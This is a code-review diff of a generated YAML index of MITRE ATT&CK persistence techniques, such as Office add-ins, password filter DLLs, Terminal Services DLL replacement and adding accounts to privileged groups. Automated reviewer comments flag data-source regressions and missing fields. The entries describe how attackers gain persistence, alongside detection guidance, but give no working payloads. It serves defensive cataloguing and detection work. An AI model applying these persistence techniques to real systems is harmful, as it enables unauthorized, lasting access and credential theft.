x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -34879,7 +35252,7 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -34905,6 +35278,10 @@ persistence:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
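Review bot: the new 'Hexacorn DLL Hijacking' reference matches the `(Citation: Hexacorn DLL Hijacking)` tag added to the T1574.001 description earlier in this diff, so the citation resolves. Pre-existing and not introduced here: the following entry's description reads `Microsoft. (, May 23). Microsoft Security Advisory 2269637.` with an empty year; it comes from upstream, so fix it there rather than in the generated file.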
@@ -34932,42 +35309,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1137.006:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
- type: attack-pattern
- created: '2019-11-07T19:52:52.801Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.006
- url: https://attack.mitre.org/techniques/T1137/006
- - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
- description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
- source_name: Microsoft Office Add-ins
- - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
- description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
- Persistence. Retrieved July 3, 2017.
- source_name: MRWLabs Office Persistence Add-ins
- - source_name: FireEye Mail CDS 2018
- url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
- description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
- Enterprise Email Compromise. Retrieved April 22, 2019.
- - source_name: GlobalDotName Jun 2019
- url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
- description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
- - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:37:09.190Z'
name: 'Office Application Startup: Add-ins'
description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence
on a compromised system. Office add-ins can be used to add functionality to
@@ -34982,13 +35328,18 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Modification'
@@ -34996,11 +35347,34 @@ persistence:
- 'Windows Registry: Windows Registry Key Creation'
- 'Process: Process Creation'
- 'File: File Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
+ created: '2019-11-07T19:52:52.801Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/006
+ external_id: T1137.006
+ - source_name: FireEye Mail CDS 2018
+ description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
+ Enterprise Email Compromise. Retrieved April 22, 2019.
+ url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
+ - source_name: MRWLabs Office Persistence Add-ins
+ description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
+ Persistence. Retrieved July 3, 2017.
+ url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
+ - source_name: Microsoft Office Add-ins
+ description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
+ url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
+ - source_name: GlobalDotName Jun 2019
+ description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+ - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+ url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.006
atomic_tests: []
T1505.002:
@@ -35031,7 +35405,7 @@ persistence:
url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from
remote code execution. Retrieved June 24, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T17:05:44.321Z'
name: 'Server Software Component: Transport Agent'
description: "Adversaries may abuse Microsoft transport agents to establish
persistent access to systems. Microsoft Exchange transport agents can operate
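Review bot: the `modified` timestamp for T1505.002 moves backwards here, from '2022-04-25T14:00:00.188Z' to '2021-10-18T17:05:44.321Z', so this is not a newer revision of the object but the same object taken from a different source bundle. The same regression appears on T1546.011, T1037.002, T1205, T1525 and T1547.005 further down, alongside the removal of `spec_version: '2.1'` from many objects, which points to the index generator now reading a STIX 2.0 bundle rather than the STIX 2.1 one. Please state the new data source in the PR description and confirm that the description and detection text carried for these techniques is not older than what the index had before.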
@@ -35069,13 +35443,11 @@ persistence:
- SYSTEM
- Administrator
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1505.002
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
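Review bot: T1505.002 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` in this hunk with no replacement value, while other objects in the patch keep or gain `x_mitre_attack_spec_version: 3.2.0`. Anything downstream that filters or validates on that field will now see it as absent for this technique (T1546.011, T1525 and T1547.005 get the same treatment later in the patch); if the generator and its consumers are meant to tolerate a missing spec version, say so in the PR description, otherwise carry the value over.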
@@ -35101,7 +35473,7 @@ persistence:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -35143,7 +35515,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1098.006:
technique:
@@ -35221,11 +35592,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -35305,35 +35675,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
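Review bot: most of the lines removed here for T1556.002 (`x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref`, `external_references`) are not deletions but the same keys re-emitted at a different position in the following hunk, with the `modified` value being the only substantive change in this region. Emitting keys in a stable, sorted order from the index generator would keep future refreshes to a few-line diff and make the real content changes reviewable instead of buried in reordering churn.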
@@ -35357,71 +35702,60 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
T1505.005:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
- created: '2022-03-28T15:34:44.590Z'
- x_mitre_version: '1.0'
- external_references:
- - source_name: mitre-attack
- external_id: T1505.005
- url: https://attack.mitre.org/techniques/T1505/005
- - source_name: James TermServ DLL
- url: https://twitter.com/james_inthe_box/status/1150495335812177920
- description: James. (2019, July 14). @James_inthe_box. Retrieved March 28,
- 2022.
- - source_name: Microsoft System Services Fundamentals
- url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
- description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
- Retrieved March 28, 2022.
- - source_name: Microsoft Remote Desktop Services
- url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
- description: Microsoft. (2019, August 23). About Remote Desktop Services.
- Retrieved March 28, 2022.
- - source_name: RDPWrap Github
- url: https://github.com/stascorp/rdpwrap
- description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
- Retrieved March 28, 2022.
- - source_name: Windows OS Hub RDP
- url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
- description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
- Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-12T19:40:42.810Z'
+ name: 'Server Software Component: Terminal Services DLL'
description: |-
Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
[Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: svchost.exe
) load the service's DLL file, the location of which is stored in a Registry entry named ServiceDll
.(Citation: Microsoft System Services Fundamentals) The termsrv.dll
file, typically stored in `%SystemRoot%\System32\`, is the default ServiceDll
value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal termsrv.dll
functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the termsrv.dll
file or modifying the ServiceDll
value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Server Software Component: Terminal Services DLL'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for changes to Registry keys associated with ServiceDll
and other subkey values under HKLM\System\CurrentControlSet\services\TermService\Parameters\
.
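Review bot: `x_mitre_permissions_required` (Administrator, SYSTEM) disappears from T1556.002 together with the bump of `x_mitre_version` from '2.0' to '2.1', and none of the remaining fields record the privilege level that registering a password filter DLL requires. If upstream dropped the field, any index consumer that renders a "permissions required" column should be checked for the missing-key case rather than assuming the key is always present.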
@@ -35430,24 +35764,56 @@ persistence:
Monitor commands as well as processes and arguments for potential adversary actions to modify Registry values (ex: reg.exe
) or modify/replace the legitimate termsrv.dll
.
Monitor module loads by the Terminal Services process (ex: svchost.exe -k termsvcs
) for unexpected DLLs (the default is %SystemRoot%\System32\termsrv.dll
, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Command: Command Execution'
- 'File: File Modification'
- 'Windows Registry: Windows Registry Key Modification'
- 'Process: Process Creation'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
+ created: '2022-03-28T15:34:44.590Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1505/005
+ external_id: T1505.005
+ - source_name: James TermServ DLL
+ description: James. (2019, July 14). @James_inthe_box. Retrieved September
+ 12, 2024.
+ url: https://x.com/james_inthe_box/status/1150495335812177920
+ - source_name: Microsoft System Services Fundamentals
+ description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
+ Retrieved March 28, 2022.
+ url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
+ - source_name: Microsoft Remote Desktop Services
+ description: Microsoft. (2019, August 23). About Remote Desktop Services.
+ Retrieved March 28, 2022.
+ url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
+ - source_name: RDPWrap Github
+ description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
+ Retrieved March 28, 2022.
+ url: https://github.com/stascorp/rdpwrap
+ - source_name: Windows OS Hub RDP
+ description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
+ Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
+ url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1505.005
atomic_tests: []
T1176:
technique:
- modified: '2024-04-18T23:22:37.874Z'
+ modified: '2024-09-12T19:48:15.871Z'
name: Browser Extensions
description: "Adversaries may abuse Internet browser extensions to establish
persistent access to victim systems. Browser extensions or plugins are small
@@ -35539,8 +35905,8 @@ persistence:
url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
- source_name: Chrome Extension C2 Malware
description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might
- get hacked by a Chrome extension. Retrieved November 22, 2017.'
- url: https://kjaer.io/extension-malware/
+ get hacked by a Chrome extension. Retrieved September 12, 2024.'
+ url: https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/
- source_name: Catch All Chrome Extension
description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension
Steals All Posted Data. Retrieved November 16, 2017.
@@ -35571,7 +35937,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1176
atomic_tests:
- name: Chrome/Chromium (Developer Mode)
@@ -35626,66 +35991,135 @@ persistence:
name: manual
T1137.005:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:02:26.206Z'
+ name: Outlook Rules
+ description: |-
+ Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
+
+ Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
x_mitre_contributors:
- Microsoft Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+
+ Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Application Log: Application Log Content'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
created: '2019-11-07T20:00:25.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1137.005
url: https://attack.mitre.org/techniques/T1137/005
- - source_name: SilentBreak Outlook Rules
- url: https://silentbreaksecurity.com/malicious-outlook-rules/
- description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
- February 4, 2019.
+ external_id: T1137.005
+ - source_name: Pfammatter - Hidden Inbox Rules
+ description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
+ Microsoft Exchange. Retrieved October 12, 2021.
+ url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
- source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
4, 2019.
- - source_name: Pfammatter - Hidden Inbox Rules
- url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
- description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
- Microsoft Exchange. Retrieved October 12, 2021.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SilentBreak Outlook Rules
+ description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
+ February 4, 2019.
+ url: https://silentbreaksecurity.com/malicious-outlook-rules/
- source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
- name: Outlook Rules
- description: |-
- Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
-
- Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+ url: https://github.com/sensepost/notruler
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1098.007:
+ technique:
+ modified: '2024-10-14T14:32:08.926Z'
+ name: Additional Local or Domain Groups
+ description: "An adversary may add additional local or domain groups to an adversary-controlled
+ account to maintain persistent access to a system or domain.\n\nOn Windows,
+ accounts may use the `net localgroup` and `net group` commands to add existing
+ users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+ Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+ the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+ added to the local administrators group on Windows devices to maintain elevated
+ privileges. They may also be added to the Remote Desktop Users group, which
+ allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+ to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+ Linux, accounts may be added to the sudoers group, allowing them to persistently
+ leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+ for elevated privileges. \n\nIn Windows environments, machine accounts may
+ also be added to domain groups. This allows the local SYSTEM account to gain
+ privileges on the domain.(Citation: RootDSE AD Detection 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_detection: |-
- Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-
- Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Application Log: Application Log Content'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ - 'User Account: User Account Modification'
+ type: attack-pattern
+ id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+ created: '2024-08-05T20:49:49.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1098/007
+ external_id: T1098.007
+ - source_name: Linux Usermod
+ description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+ url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+ - source_name: Microsoft Net Group
+ description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+ 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+ - source_name: Microsoft Net Localgroup
+ description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+ 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+ - source_name: Microsoft RDP Logons
+ description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+ Services. Retrieved August 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+ - source_name: RootDSE AD Detection 2022
+ description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+ Active Directory environments. Retrieved August 5, 2024.
+ url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+ object_marking_refs:
